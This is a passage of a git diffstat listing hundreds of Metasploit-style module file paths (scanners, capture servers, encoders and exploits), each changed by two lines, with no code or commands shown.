modules/auxiliary/scanner/ntp/ntp_monlist.rb | 2 +- modules/auxiliary/scanner/ntp/ntp_nak_to_the_future.rb | 2 +- modules/auxiliary/scanner/ntp/ntp_peer_list_dos.rb | 2 +- modules/auxiliary/scanner/ntp/ntp_peer_list_sum_dos.rb | 2 +- modules/auxiliary/scanner/ntp/ntp_readvar.rb | 2 +- modules/auxiliary/scanner/ntp/ntp_req_nonce_dos.rb | 2 +- modules/auxiliary/scanner/ntp/ntp_reslist_dos.rb | 2 +- modules/auxiliary/scanner/ntp/ntp_unsettrap_dos.rb | 2 +- modules/auxiliary/scanner/openvas/openvas_gsad_login.rb | 2 +- modules/auxiliary/scanner/openvas/openvas_omp_login.rb | 2 +- modules/auxiliary/scanner/openvas/openvas_otp_login.rb | 2 +- modules/auxiliary/scanner/oracle/emc_sid.rb | 2 +- modules/auxiliary/scanner/oracle/isqlplus_login.rb | 2 +- modules/auxiliary/scanner/oracle/isqlplus_sidbrute.rb | 2 +- modules/auxiliary/scanner/oracle/oracle_hashdump.rb | 2 +- modules/auxiliary/scanner/oracle/oracle_login.rb | 2 +- modules/auxiliary/scanner/oracle/sid_brute.rb | 2 +- modules/auxiliary/scanner/oracle/sid_enum.rb | 2 +- modules/auxiliary/scanner/oracle/spy_sid.rb | 2 +- modules/auxiliary/scanner/oracle/tnslsnr_version.rb | 2 +- modules/auxiliary/scanner/oracle/tnspoison_checker.rb | 2 +- modules/auxiliary/scanner/oracle/xdb_sid.rb | 2 +- modules/auxiliary/scanner/oracle/xdb_sid_brute.rb | 2 +- modules/auxiliary/scanner/pcanywhere/pcanywhere_login.rb | 2 +- modules/auxiliary/scanner/pcanywhere/pcanywhere_tcp.rb | 2 +- modules/auxiliary/scanner/pcanywhere/pcanywhere_udp.rb | 2 +- modules/auxiliary/scanner/pop3/pop3_login.rb | 2 +- modules/auxiliary/scanner/pop3/pop3_version.rb | 2 +- modules/auxiliary/scanner/portmap/portmap_amp.rb | 2 +- modules/auxiliary/scanner/portscan/ack.rb | 2 +- modules/auxiliary/scanner/portscan/ftpbounce.rb | 2 +- modules/auxiliary/scanner/portscan/syn.rb | 2 +- modules/auxiliary/scanner/portscan/tcp.rb | 2 +- modules/auxiliary/scanner/portscan/xmas.rb | 2 +- .../scanner/postgres/postgres_dbname_flag_injection.rb | 2 +- modules/auxiliary/scanner/postgres/postgres_hashdump.rb | 2 +- modules/auxiliary/scanner/postgres/postgres_login.rb | 2 +- modules/auxiliary/scanner/postgres/postgres_schemadump.rb | 2 +- modules/auxiliary/scanner/postgres/postgres_version.rb | 2 +- modules/auxiliary/scanner/quake/server_info.rb | 2 +- modules/auxiliary/scanner/rdp/ms12_020_check.rb | 2 +- modules/auxiliary/scanner/redis/file_upload.rb | 2 +- modules/auxiliary/scanner/redis/redis_server.rb | 2 +- modules/auxiliary/scanner/rogue/rogue_recv.rb | 2 +- modules/auxiliary/scanner/rogue/rogue_send.rb | 2 +- modules/auxiliary/scanner/rservices/rexec_login.rb | 2 +- modules/auxiliary/scanner/rservices/rlogin_login.rb | 2 +- modules/auxiliary/scanner/rservices/rsh_login.rb | 2 +- modules/auxiliary/scanner/rsync/modules_list.rb | 2 +- modules/auxiliary/scanner/sap/sap_icm_urlscan.rb | 2 +- modules/auxiliary/scanner/sap/sap_router_portscanner.rb | 2 +- modules/auxiliary/scanner/scada/digi_addp_reboot.rb | 2 +- modules/auxiliary/scanner/scada/digi_addp_version.rb | 2 +- .../auxiliary/scanner/scada/digi_realport_serialport_scan.rb | 2 +- modules/auxiliary/scanner/scada/digi_realport_version.rb | 2 +- modules/auxiliary/scanner/scada/koyo_login.rb | 2 +- modules/auxiliary/scanner/scada/modbus_findunitid.rb | 2 +- modules/auxiliary/scanner/scada/modbusclient.rb | 2 +- modules/auxiliary/scanner/scada/modbusdetect.rb | 2 +- modules/auxiliary/scanner/scada/sielco_winlog_fileaccess.rb | 2 +- modules/auxiliary/scanner/sip/enumerator.rb | 2 +- modules/auxiliary/scanner/sip/enumerator_tcp.rb | 2 +- modules/auxiliary/scanner/sip/options.rb | 2 +- modules/auxiliary/scanner/sip/options_tcp.rb | 2 +- modules/auxiliary/scanner/sip/sipdroid_ext_enum.rb | 2 +- modules/auxiliary/scanner/smb/pipe_auditor.rb | 2 +- modules/auxiliary/scanner/smb/pipe_dcerpc_auditor.rb | 2 +- modules/auxiliary/scanner/smb/psexec_loggedin_users.rb | 2 +- modules/auxiliary/scanner/smb/smb2.rb | 2 +- modules/auxiliary/scanner/smb/smb_enum_gpp.rb | 2 +- modules/auxiliary/scanner/smb/smb_enumshares.rb | 2 +- modules/auxiliary/scanner/smb/smb_enumusers.rb | 2 +- modules/auxiliary/scanner/smb/smb_enumusers_domain.rb | 2 +- modules/auxiliary/scanner/smb/smb_login.rb | 2 +- modules/auxiliary/scanner/smb/smb_lookupsid.rb | 2 +- modules/auxiliary/scanner/smb/smb_uninit_cred.rb | 2 +- modules/auxiliary/scanner/smb/smb_version.rb | 2 +- modules/auxiliary/scanner/smtp/smtp_enum.rb | 2 +- modules/auxiliary/scanner/smtp/smtp_ntlm_domain.rb | 2 +- modules/auxiliary/scanner/smtp/smtp_relay.rb | 2 +- modules/auxiliary/scanner/smtp/smtp_version.rb | 2 +- modules/auxiliary/scanner/snmp/aix_version.rb | 2 +- modules/auxiliary/scanner/snmp/arris_dg950.rb | 2 +- modules/auxiliary/scanner/snmp/brocade_enumhash.rb | 2 +- modules/auxiliary/scanner/snmp/cisco_config_tftp.rb | 2 +- modules/auxiliary/scanner/snmp/cisco_upload_file.rb | 2 +- modules/auxiliary/scanner/snmp/netopia_enum.rb | 2 +- modules/auxiliary/scanner/snmp/sbg6580_enum.rb | 2 +- modules/auxiliary/scanner/snmp/snmp_enum.rb | 2 +- modules/auxiliary/scanner/snmp/snmp_enum_hp_laserjet.rb | 2 +- modules/auxiliary/scanner/snmp/snmp_enumshares.rb | 2 +- modules/auxiliary/scanner/snmp/snmp_enumusers.rb | 2 +- modules/auxiliary/scanner/snmp/snmp_login.rb | 2 +- modules/auxiliary/scanner/snmp/snmp_set.rb | 2 +- modules/auxiliary/scanner/snmp/ubee_ddw3611.rb | 2 +- modules/auxiliary/scanner/snmp/xerox_workcentre_enumusers.rb | 2 +- modules/auxiliary/scanner/ssh/cerberus_sftp_enumusers.rb | 2 +- modules/auxiliary/scanner/ssh/karaf_login.rb | 2 +- modules/auxiliary/scanner/ssh/ssh_enumusers.rb | 2 +- modules/auxiliary/scanner/ssh/ssh_identify_pubkeys.rb | 2 +- modules/auxiliary/scanner/ssh/ssh_login.rb | 2 +- modules/auxiliary/scanner/ssh/ssh_login_pubkey.rb | 2 +- modules/auxiliary/scanner/ssh/ssh_version.rb | 2 +- modules/auxiliary/scanner/ssl/openssl_ccs.rb | 2 +- modules/auxiliary/scanner/ssl/openssl_heartbleed.rb | 2 +- modules/auxiliary/scanner/steam/server_info.rb | 2 +- modules/auxiliary/scanner/telephony/wardial.rb | 2 +- modules/auxiliary/scanner/telnet/lantronix_telnet_version.rb | 2 +- modules/auxiliary/scanner/telnet/telnet_encrypt_overflow.rb | 2 +- modules/auxiliary/scanner/telnet/telnet_login.rb | 2 +- modules/auxiliary/scanner/telnet/telnet_ruggedcom.rb | 2 +- modules/auxiliary/scanner/telnet/telnet_version.rb | 2 +- modules/auxiliary/scanner/tftp/ipswitch_whatsupgold_tftp.rb | 2 +- modules/auxiliary/scanner/tftp/netdecision_tftp.rb | 2 +- modules/auxiliary/scanner/tftp/tftpbrute.rb | 2 +- modules/auxiliary/scanner/udp_scanner_template.rb | 2 +- modules/auxiliary/scanner/upnp/ssdp_amp.rb | 2 +- modules/auxiliary/scanner/upnp/ssdp_msearch.rb | 2 +- modules/auxiliary/scanner/vmware/esx_fingerprint.rb | 2 +- modules/auxiliary/scanner/vmware/vmauthd_login.rb | 2 +- modules/auxiliary/scanner/vmware/vmauthd_version.rb | 2 +- modules/auxiliary/scanner/vmware/vmware_enum_permissions.rb | 2 +- modules/auxiliary/scanner/vmware/vmware_enum_sessions.rb | 2 +- modules/auxiliary/scanner/vmware/vmware_enum_users.rb | 2 +- modules/auxiliary/scanner/vmware/vmware_enum_vms.rb | 2 +- modules/auxiliary/scanner/vmware/vmware_host_details.rb | 2 +- modules/auxiliary/scanner/vmware/vmware_http_login.rb | 2 +- modules/auxiliary/scanner/vmware/vmware_screenshot_stealer.rb | 2 +- modules/auxiliary/scanner/vmware/vmware_server_dir_trav.rb | 2 +- .../auxiliary/scanner/vmware/vmware_update_manager_traversal.rb | 2 +- modules/auxiliary/scanner/vnc/vnc_login.rb | 2 +- modules/auxiliary/scanner/vnc/vnc_none_auth.rb | 2 +- modules/auxiliary/scanner/voice/recorder.rb | 2 +- modules/auxiliary/scanner/vxworks/wdbrpc_bootline.rb | 2 +- modules/auxiliary/scanner/vxworks/wdbrpc_version.rb | 2 +- modules/auxiliary/scanner/winrm/winrm_auth_methods.rb | 2 +- modules/auxiliary/scanner/winrm/winrm_cmd.rb | 2 +- modules/auxiliary/scanner/winrm/winrm_login.rb | 2 +- modules/auxiliary/scanner/winrm/winrm_wql.rb | 2 +- modules/auxiliary/scanner/x11/open_x11.rb | 2 +- modules/auxiliary/server/android_browsable_msf_launch.rb | 2 +- modules/auxiliary/server/android_mercury_parseuri.rb | 2 +- modules/auxiliary/server/browser_autopwn.rb | 2 +- modules/auxiliary/server/browser_autopwn2.rb | 2 +- modules/auxiliary/server/capture/drda.rb | 2 +- modules/auxiliary/server/capture/ftp.rb | 2 +- modules/auxiliary/server/capture/http.rb | 2 +- modules/auxiliary/server/capture/http_basic.rb | 2 +- modules/auxiliary/server/capture/http_javascript_keylogger.rb | 2 +- modules/auxiliary/server/capture/http_ntlm.rb | 2 +- modules/auxiliary/server/capture/imap.rb | 2 +- modules/auxiliary/server/capture/mssql.rb | 2 +- modules/auxiliary/server/capture/mysql.rb | 2 +- modules/auxiliary/server/capture/pop3.rb | 2 +- modules/auxiliary/server/capture/postgresql.rb | 2 +- modules/auxiliary/server/capture/printjob_capture.rb | 2 +- modules/auxiliary/server/capture/sip.rb | 2 +- modules/auxiliary/server/capture/smb.rb | 2 +- modules/auxiliary/server/capture/smtp.rb | 2 +- modules/auxiliary/server/capture/telnet.rb | 2 +- modules/auxiliary/server/capture/vnc.rb | 2 +- modules/auxiliary/server/dhclient_bash_env.rb | 2 +- modules/auxiliary/server/dhcp.rb | 2 +- modules/auxiliary/server/dns/spoofhelper.rb | 2 +- modules/auxiliary/server/fakedns.rb | 2 +- modules/auxiliary/server/ftp.rb | 2 +- modules/auxiliary/server/http_ntlmrelay.rb | 2 +- modules/auxiliary/server/icmp_exfil.rb | 2 +- modules/auxiliary/server/jsse_skiptls_mitm_proxy.rb | 2 +- modules/auxiliary/server/ms15_134_mcl_leak.rb | 2 +- modules/auxiliary/server/openssl_altchainsforgery_mitm_proxy.rb | 2 +- modules/auxiliary/server/openssl_heartbeat_client_memory.rb | 2 +- modules/auxiliary/server/pxeexploit.rb | 2 +- modules/auxiliary/server/socks4a.rb | 2 +- modules/auxiliary/server/socks_unc.rb | 2 +- modules/auxiliary/server/tftp.rb | 2 +- modules/auxiliary/server/webkit_xslt_dropper.rb | 2 +- modules/auxiliary/server/wget_symlink_file_write.rb | 2 +- modules/auxiliary/server/wpad.rb | 2 +- modules/auxiliary/sniffer/psnuffle.rb | 2 +- modules/auxiliary/spoof/arp/arp_poisoning.rb | 2 +- modules/auxiliary/spoof/cisco/cdp.rb | 2 +- modules/auxiliary/spoof/cisco/dtp.rb | 2 +- modules/auxiliary/spoof/dns/bailiwicked_domain.rb | 2 +- modules/auxiliary/spoof/dns/bailiwicked_host.rb | 2 +- modules/auxiliary/spoof/dns/compare_results.rb | 2 +- modules/auxiliary/spoof/llmnr/llmnr_response.rb | 2 +- modules/auxiliary/spoof/nbns/nbns_response.rb | 2 +- modules/auxiliary/spoof/replay/pcap_replay.rb | 2 +- modules/auxiliary/sqli/oracle/dbms_cdc_ipublish.rb | 2 +- modules/auxiliary/sqli/oracle/dbms_cdc_publish.rb | 2 +- modules/auxiliary/sqli/oracle/dbms_cdc_publish2.rb | 2 +- modules/auxiliary/sqli/oracle/dbms_cdc_publish3.rb | 2 +- .../sqli/oracle/dbms_cdc_subscribe_activate_subscription.rb | 2 +- modules/auxiliary/sqli/oracle/dbms_export_extension.rb | 2 +- modules/auxiliary/sqli/oracle/dbms_metadata_get_granted_xml.rb | 2 +- modules/auxiliary/sqli/oracle/dbms_metadata_get_xml.rb | 2 +- modules/auxiliary/sqli/oracle/dbms_metadata_open.rb | 2 +- modules/auxiliary/sqli/oracle/droptable_trigger.rb | 2 +- modules/auxiliary/sqli/oracle/jvm_os_code_10g.rb | 2 +- modules/auxiliary/sqli/oracle/jvm_os_code_11g.rb | 2 +- modules/auxiliary/sqli/oracle/lt_compressworkspace.rb | 2 +- modules/auxiliary/sqli/oracle/lt_findricset_cursor.rb | 2 +- modules/auxiliary/sqli/oracle/lt_mergeworkspace.rb | 2 +- modules/auxiliary/sqli/oracle/lt_removeworkspace.rb | 2 +- modules/auxiliary/sqli/oracle/lt_rollbackworkspace.rb | 2 +- modules/auxiliary/voip/asterisk_login.rb | 2 +- modules/auxiliary/voip/cisco_cucdm_call_forward.rb | 2 +- modules/auxiliary/voip/cisco_cucdm_speed_dials.rb | 2 +- modules/auxiliary/voip/sip_deregister.rb | 2 +- modules/auxiliary/voip/sip_invite_spoof.rb | 2 +- modules/auxiliary/voip/telisca_ips_lock_control.rb | 2 +- modules/auxiliary/vsploit/malware/dns/dns_mariposa.rb | 2 +- modules/auxiliary/vsploit/malware/dns/dns_query.rb | 2 +- modules/auxiliary/vsploit/malware/dns/dns_zeus.rb | 2 +- modules/auxiliary/vsploit/pii/email_pii.rb | 2 +- modules/auxiliary/vsploit/pii/web_pii.rb | 2 +- modules/encoders/cmd/echo.rb | 2 +- modules/encoders/cmd/generic_sh.rb | 2 +- modules/encoders/cmd/ifs.rb | 2 +- modules/encoders/cmd/perl.rb | 2 +- modules/encoders/cmd/powershell_base64.rb | 2 +- modules/encoders/cmd/printf_php_mq.rb | 2 +- modules/encoders/generic/eicar.rb | 2 +- modules/encoders/generic/none.rb | 2 +- modules/encoders/mipsbe/byte_xori.rb | 2 +- modules/encoders/mipsbe/longxor.rb | 2 +- modules/encoders/mipsle/byte_xori.rb | 2 +- modules/encoders/mipsle/longxor.rb | 2 +- modules/encoders/php/base64.rb | 2 +- modules/encoders/ppc/longxor.rb | 2 +- modules/encoders/ppc/longxor_tag.rb | 2 +- modules/encoders/sparc/longxor_tag.rb | 2 +- modules/encoders/x64/xor.rb | 2 +- modules/encoders/x86/add_sub.rb | 2 +- modules/encoders/x86/alpha_mixed.rb | 2 +- modules/encoders/x86/alpha_upper.rb | 2 +- modules/encoders/x86/avoid_underscore_tolower.rb | 2 +- modules/encoders/x86/avoid_utf8_tolower.rb | 2 +- modules/encoders/x86/call4_dword_xor.rb | 2 +- modules/encoders/x86/context_cpuid.rb | 2 +- modules/encoders/x86/context_stat.rb | 2 +- modules/encoders/x86/context_time.rb | 2 +- modules/encoders/x86/countdown.rb | 2 +- modules/encoders/x86/fnstenv_mov.rb | 2 +- modules/encoders/x86/jmp_call_additive.rb | 2 +- modules/encoders/x86/nonalpha.rb | 2 +- modules/encoders/x86/nonupper.rb | 2 +- modules/encoders/x86/opt_sub.rb | 2 +- modules/encoders/x86/shikata_ga_nai.rb | 2 +- modules/encoders/x86/single_static_bit.rb | 2 +- modules/encoders/x86/unicode_mixed.rb | 2 +- modules/encoders/x86/unicode_upper.rb | 2 +- modules/exploits/aix/rpc_cmsd_opcode21.rb | 2 +- modules/exploits/aix/rpc_ttdbserverd_realpath.rb | 2 +- modules/exploits/android/adb/adb_server_exec.rb | 2 +- modules/exploits/android/browser/samsung_knox_smdm_url.rb | 2 +- .../exploits/android/browser/webview_addjavascriptinterface.rb | 2 +- .../android/fileformat/adobe_reader_pdf_js_interface.rb | 2 +- modules/exploits/apple_ios/browser/safari_libtiff.rb | 2 +- modules/exploits/apple_ios/email/mobilemail_libtiff.rb | 2 +- modules/exploits/apple_ios/ssh/cydia_default_ssh.rb | 2 +- modules/exploits/bsdi/softcart/mercantec_softcart.rb | 2 +- modules/exploits/dialup/multi/login/manyargs.rb | 2 +- modules/exploits/firefox/local/exec_shellcode.rb | 2 +- modules/exploits/freebsd/ftp/proftp_telnet_iac.rb | 2 +- modules/exploits/freebsd/misc/citrix_netscaler_soap_bof.rb | 2 +- modules/exploits/freebsd/samba/trans2open.rb | 2 +- modules/exploits/freebsd/tacacs/xtacacsd_report.rb | 2 +- modules/exploits/freebsd/telnet/telnet_encrypt_keyid.rb | 2 +- modules/exploits/hpux/lpd/cleanup_exec.rb | 2 +- modules/exploits/irix/lpd/tagprinter_exec.rb | 2 +- modules/exploits/linux/antivirus/escan_password_exec.rb | 2 +- modules/exploits/linux/browser/adobe_flashplayer_aslaunch.rb | 2 +- modules/exploits/linux/ftp/proftp_sreplace.rb | 2 +- modules/exploits/linux/ftp/proftp_telnet_iac.rb | 2 +- modules/exploits/linux/games/ut2004_secure.rb | 2 +- modules/exploits/linux/http/accellion_fta_getstatus_oauth.rb | 2 +- modules/exploits/linux/http/airties_login_cgi_bof.rb | 2 +- modules/exploits/linux/http/alcatel_omnipcx_mastercgi_exec.rb | 2 +- modules/exploits/linux/http/alienvault_sqli_exec.rb | 2 +- modules/exploits/linux/http/astium_sqli_upload.rb | 2 +- modules/exploits/linux/http/belkin_login_bof.rb | 2 +- modules/exploits/linux/http/centreon_sqli_exec.rb | 2 +- modules/exploits/linux/http/ddwrt_cgibin_exec.rb | 2 +- modules/exploits/linux/http/dlink_authentication_cgi_bof.rb | 2 +- modules/exploits/linux/http/dlink_command_php_exec_noauth.rb | 2 +- .../dlink_dcs_930l_authenticated_remote_command_execution.rb | 2 +- modules/exploits/linux/http/dlink_diagnostic_exec_noauth.rb | 2 +- modules/exploits/linux/http/dlink_dir300_exec_telnet.rb | 2 +- modules/exploits/linux/http/dlink_dir605l_captcha_bof.rb | 2 +- modules/exploits/linux/http/dlink_dir615_up_exec.rb | 2 +- modules/exploits/linux/http/dlink_dspw110_cookie_noauth_exec.rb | 2 +- modules/exploits/linux/http/dlink_dspw215_info_cgi_bof.rb | 2 +- modules/exploits/linux/http/dlink_hedwig_cgi_bof.rb | 2 +- modules/exploits/linux/http/dlink_hnap_bof.rb | 2 +- modules/exploits/linux/http/dlink_hnap_header_exec_noauth.rb | 2 +- modules/exploits/linux/http/dlink_upnp_exec_noauth.rb | 2 +- modules/exploits/linux/http/dolibarr_cmd_exec.rb | 2 +- modules/exploits/linux/http/dreambox_openpli_shell.rb | 2 +- modules/exploits/linux/http/esva_exec.rb | 2 +- modules/exploits/linux/http/f5_icall_cmd.rb | 2 +- modules/exploits/linux/http/f5_icontrol_exec.rb | 2 +- modules/exploits/linux/http/fritzbox_echo_exec.rb | 2 +- modules/exploits/linux/http/gitlist_exec.rb | 2 +- modules/exploits/linux/http/gpsd_format_string.rb | 2 +- modules/exploits/linux/http/groundwork_monarch_cmd_exec.rb | 2 +- modules/exploits/linux/http/hp_system_management.rb | 2 +- modules/exploits/linux/http/kloxo_sqli.rb | 2 +- modules/exploits/linux/http/lifesize_uvc_ping_rce.rb | 2 +- modules/exploits/linux/http/linksys_apply_cgi.rb | 2 +- modules/exploits/linux/http/linksys_e1500_apply_exec.rb | 2 +- modules/exploits/linux/http/linksys_themoon_exec.rb | 2 +- modules/exploits/linux/http/linksys_wrt110_cmd_exec.rb | 2 +- modules/exploits/linux/http/linksys_wrt160nv2_apply_exec.rb | 2 +- modules/exploits/linux/http/linksys_wrt54gl_apply_exec.rb | 2 +- modules/exploits/linux/http/multi_ncc_ping_exec.rb | 2 +- modules/exploits/linux/http/mutiny_frontend_upload.rb | 2 +- modules/exploits/linux/http/netgear_dgn1000b_setup_exec.rb | 2 +- modules/exploits/linux/http/netgear_dgn2200b_pppoe_exec.rb | 2 +- modules/exploits/linux/http/netgear_readynas_exec.rb | 2 +- modules/exploits/linux/http/openfiler_networkcard_exec.rb | 2 +- modules/exploits/linux/http/pandora_fms_exec.rb | 2 +- modules/exploits/linux/http/pandora_fms_sqli.rb | 2 +- modules/exploits/linux/http/peercast_url.rb | 2 +- modules/exploits/linux/http/pineapp_ldapsyncnow_exec.rb | 2 +- modules/exploits/linux/http/pineapp_livelog_exec.rb | 2 +- modules/exploits/linux/http/pineapp_test_li_conn_exec.rb | 2 +- modules/exploits/linux/http/piranha_passwd_exec.rb | 2 +- modules/exploits/linux/http/raidsonic_nas_ib5220_exec_noauth.rb | 2 +- modules/exploits/linux/http/realtek_miniigd_upnp_exec_noauth.rb | 2 +- modules/exploits/linux/http/smt_ipmi_close_window_bof.rb | 2 +- modules/exploits/linux/http/sophos_wpa_iface_exec.rb | 2 +- modules/exploits/linux/http/sophos_wpa_sblistpack_exec.rb | 2 +- modules/exploits/linux/http/symantec_web_gateway_exec.rb | 2 +- modules/exploits/linux/http/symantec_web_gateway_file_upload.rb | 2 +- modules/exploits/linux/http/symantec_web_gateway_lfi.rb | 2 +- modules/exploits/linux/http/symantec_web_gateway_pbcontrol.rb | 2 +- modules/exploits/linux/http/symantec_web_gateway_restore.rb | 2 +- .../exploits/linux/http/synology_dsm_sliceupload_exec_noauth.rb | 2 +- modules/exploits/linux/http/vap2500_tools_command_exec.rb | 2 +- modules/exploits/linux/http/vcms_upload.rb | 2 +- modules/exploits/linux/http/wanem_exec.rb | 2 +- modules/exploits/linux/http/webcalendar_settings_exec.rb | 2 +- modules/exploits/linux/http/webid_converter.rb | 2 +- modules/exploits/linux/http/zabbix_sqli.rb | 2 +- modules/exploits/linux/http/zen_load_balancer_exec.rb | 2 +- modules/exploits/linux/http/zenoss_showdaemonxmlconfig_exec.rb | 2 +- modules/exploits/linux/ids/alienvault_centerd_soap_exec.rb | 2 +- modules/exploits/linux/ids/snortbopre.rb | 2 +- modules/exploits/linux/imap/imap_uw_lsub.rb | 2 +- modules/exploits/linux/misc/accellion_fta_mpipe2.rb | 2 +- modules/exploits/linux/misc/drb_remote_codeexec.rb | 2 +- modules/exploits/linux/misc/gld_postfix.rb | 2 +- modules/exploits/linux/misc/hp_data_protector_cmd_exec.rb | 2 +- modules/exploits/linux/misc/hp_nnmi_pmd_bof.rb | 2 +- modules/exploits/linux/misc/hp_vsa_login_bof.rb | 2 +- modules/exploits/linux/misc/hplip_hpssd_exec.rb | 2 +- modules/exploits/linux/misc/ib_inet_connect.rb | 2 +- modules/exploits/linux/misc/ib_jrd8_create_database.rb | 2 +- modules/exploits/linux/misc/ib_open_marker_file.rb | 2 +- modules/exploits/linux/misc/ib_pwd_db_aliased.rb | 2 +- modules/exploits/linux/misc/jenkins_java_deserialize.rb | 2 +- modules/exploits/linux/misc/lprng_format_string.rb | 2 +- modules/exploits/linux/misc/mongod_native_helper.rb | 2 +- modules/exploits/linux/misc/nagios_nrpe_arguments.rb | 2 +- modules/exploits/linux/misc/netsupport_manager_agent.rb | 2 +- modules/exploits/linux/misc/novell_edirectory_ncp_bof.rb | 2 +- modules/exploits/linux/misc/sercomm_exec.rb | 2 +- modules/exploits/linux/misc/zabbix_server_exec.rb | 2 +- modules/exploits/linux/mysql/mysql_yassl_getname.rb | 2 +- modules/exploits/linux/mysql/mysql_yassl_hello.rb | 2 +- modules/exploits/linux/pop3/cyrus_pop3d_popsubfolders.rb | 2 +- modules/exploits/linux/postgres/postgres_payload.rb | 2 +- modules/exploits/linux/pptp/poptop_negative_read.rb | 2 +- modules/exploits/linux/proxy/squid_ntlm_authenticate.rb | 2 +- modules/exploits/linux/samba/chain_reply.rb | 2 +- modules/exploits/linux/samba/lsa_transnames_heap.rb | 2 +- modules/exploits/linux/samba/setinfopolicy_heap.rb | 2 +- modules/exploits/linux/samba/trans2open.rb | 2 +- modules/exploits/linux/smtp/exim4_dovecot_exec.rb | 2 +- modules/exploits/linux/ssh/ceragon_fibeair_known_privkey.rb | 2 +- modules/exploits/linux/ssh/f5_bigip_known_privkey.rb | 2 +- .../linux/ssh/loadbalancerorg_enterprise_known_privkey.rb | 2 +- modules/exploits/linux/ssh/quantum_dxi_known_privkey.rb | 2 +- modules/exploits/linux/ssh/quantum_vmpro_backdoor.rb | 2 +- modules/exploits/linux/ssh/symantec_smg_ssh.rb | 2 +- modules/exploits/linux/telnet/telnet_encrypt_keyid.rb | 2 +- modules/exploits/linux/upnp/dlink_upnp_msearch_exec.rb | 2 +- modules/exploits/linux/upnp/miniupnpd_soap_bof.rb | 2 +- modules/exploits/multi/browser/adobe_flash_hacking_team_uaf.rb | 2 +- modules/exploits/multi/browser/adobe_flash_nellymoser_bof.rb | 2 +- .../multi/browser/adobe_flash_net_connection_confusion.rb | 2 +- .../exploits/multi/browser/adobe_flash_opaque_background_uaf.rb | 2 +- modules/exploits/multi/browser/adobe_flash_pixel_bender_bof.rb | 2 +- .../exploits/multi/browser/adobe_flash_shader_drawing_fill.rb | 2 +- .../exploits/multi/browser/adobe_flash_shader_job_overflow.rb | 2 +- .../exploits/multi/browser/adobe_flash_uncompress_zlib_uaf.rb | 2 +- modules/exploits/multi/browser/firefox_escape_retval.rb | 2 +- .../multi/browser/firefox_pdfjs_privilege_escalation.rb | 2 +- modules/exploits/multi/browser/firefox_proto_crmfrequest.rb | 2 +- modules/exploits/multi/browser/firefox_proxy_prototype.rb | 2 +- modules/exploits/multi/browser/firefox_queryinterface.rb | 2 +- modules/exploits/multi/browser/firefox_svg_plugin.rb | 2 +- .../multi/browser/firefox_tostring_console_injection.rb | 2 +- modules/exploits/multi/browser/firefox_webidl_injection.rb | 2 +- .../exploits/multi/browser/firefox_xpi_bootstrapped_addon.rb | 2 +- modules/exploits/multi/browser/itms_overflow.rb | 2 +- modules/exploits/multi/browser/java_atomicreferencearray.rb | 2 +- modules/exploits/multi/browser/java_calendar_deserialize.rb | 2 +- modules/exploits/multi/browser/java_getsoundbank_bof.rb | 2 +- modules/exploits/multi/browser/java_jre17_driver_manager.rb | 2 +- modules/exploits/multi/browser/java_jre17_exec.rb | 2 +- .../browser/java_jre17_glassfish_averagerangestatisticimpl.rb | 2 +- modules/exploits/multi/browser/java_jre17_jaxws.rb | 2 +- modules/exploits/multi/browser/java_jre17_jmxbean.rb | 2 +- modules/exploits/multi/browser/java_jre17_jmxbean_2.rb | 2 +- modules/exploits/multi/browser/java_jre17_method_handle.rb | 2 +- modules/exploits/multi/browser/java_jre17_provider_skeleton.rb | 2 +- modules/exploits/multi/browser/java_jre17_reflection_types.rb | 2 +- modules/exploits/multi/browser/java_rhino.rb | 2 +- modules/exploits/multi/browser/java_rmi_connection_impl.rb | 2 +- modules/exploits/multi/browser/java_setdifficm_bof.rb | 2 +- modules/exploits/multi/browser/java_signed_applet.rb | 2 +- modules/exploits/multi/browser/java_storeimagearray.rb | 2 +- modules/exploits/multi/browser/java_trusted_chain.rb | 2 +- modules/exploits/multi/browser/java_verifier_field_access.rb | 2 +- modules/exploits/multi/browser/mozilla_compareto.rb | 2 +- modules/exploits/multi/browser/mozilla_navigatorjava.rb | 2 +- modules/exploits/multi/browser/opera_configoverwrite.rb | 2 +- modules/exploits/multi/browser/opera_historysearch.rb | 2 +- modules/exploits/multi/browser/qtjava_pointer.rb | 2 +- modules/exploits/multi/elasticsearch/script_mvel_rce.rb | 2 +- modules/exploits/multi/elasticsearch/search_groovy_script.rb | 2 +- modules/exploits/multi/fileformat/adobe_u3d_meshcont.rb | 2 +- modules/exploits/multi/fileformat/js_unpacker_eval_injection.rb | 2 +- modules/exploits/multi/fileformat/maple_maplet.rb | 2 +- .../exploits/multi/fileformat/nodejs_js_yaml_load_code_exec.rb | 2 +- modules/exploits/multi/fileformat/peazip_command_injection.rb | 2 +- modules/exploits/multi/ftp/wuftpd_site_exec_format.rb | 2 +- modules/exploits/multi/gdb/gdb_server_exec.rb | 2 +- modules/exploits/multi/handler.rb | 2 +- modules/exploits/multi/http/activecollab_chat.rb | 2 +- modules/exploits/multi/http/ajaxplorer_checkinstall_exec.rb | 2 +- modules/exploits/multi/http/apache_roller_ognl_injection.rb | 2 +- modules/exploits/multi/http/apprain_upload_exec.rb | 2 +- modules/exploits/multi/http/atutor_sqli.rb | 2 +- modules/exploits/multi/http/auxilium_upload_exec.rb | 2 +- modules/exploits/multi/http/axis2_deployer.rb | 2 +- modules/exploits/multi/http/bolt_file_upload.rb | 2 +- modules/exploits/multi/http/cisco_dcnm_upload.rb | 2 +- modules/exploits/multi/http/coldfusion_rds.rb | 2 +- modules/exploits/multi/http/cuteflow_upload_exec.rb | 2 +- modules/exploits/multi/http/dexter_casinoloader_exec.rb | 2 +- modules/exploits/multi/http/drupal_drupageddon.rb | 2 +- modules/exploits/multi/http/eaton_nsm_code_exec.rb | 2 +- modules/exploits/multi/http/eventlog_file_upload.rb | 2 +- modules/exploits/multi/http/extplorer_upload_exec.rb | 2 +- modules/exploits/multi/http/familycms_less_exec.rb | 2 +- modules/exploits/multi/http/freenas_exec_raw.rb | 2 +- modules/exploits/multi/http/gitlab_shell_exec.rb | 2 +- modules/exploits/multi/http/gitorious_graph.rb | 2 +- modules/exploits/multi/http/glassfish_deployer.rb | 2 +- modules/exploits/multi/http/glossword_upload_exec.rb | 2 +- modules/exploits/multi/http/glpi_install_rce.rb | 2 +- modules/exploits/multi/http/horde_href_backdoor.rb | 2 +- modules/exploits/multi/http/hp_sitescope_issuesiebelcmd.rb | 2 +- modules/exploits/multi/http/hp_sitescope_uploadfileshandler.rb | 2 +- modules/exploits/multi/http/hp_sys_mgmt_exec.rb | 2 +- modules/exploits/multi/http/hyperic_hq_script_console.rb | 2 +- 